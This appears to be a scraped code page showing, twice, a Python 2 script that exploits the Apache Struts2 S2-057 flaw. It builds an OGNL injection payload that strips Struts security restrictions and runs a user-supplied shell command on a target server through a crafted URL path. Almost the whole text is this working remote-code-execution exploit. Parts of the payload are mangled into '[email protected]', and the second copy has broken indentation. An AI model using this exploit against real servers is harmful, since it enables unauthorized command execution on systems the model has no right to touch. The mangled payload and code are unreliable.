frohoff · August 23, 2018 17:21
diff --git a/s2-057.py b/s2-057.py
 # some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg

 import sys
 import urllib
 import urllib2

 if len(sys.argv) != 3:
    print 'Usage: %s [url] [command]' % sys.argv[0]
    exit(1)

 _, url, cmd = sys.argv

 payload = "${(#[email protected]@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))

 url_parts = url.rsplit('/', 1)

 request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1] 

 print 'payload: %s' % payload
 print 'request: %s' % request
 print 'making request'
 urllib.urlopen(request)
 print 'done'
	# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg

	import sys
	import urllib
	import urllib2

	if len(sys.argv) != 3:
	print 'Usage: %s [url] [command]' % sys.argv[0]
	exit(1)

	_, url, cmd = sys.argv

	payload = "${(#[email protected]@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))

	url_parts = url.rsplit('/', 1)

	request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1]

	print 'payload: %s' % payload
	print 'request: %s' % request
	print 'making request'
	urllib.urlopen(request)
	print 'done'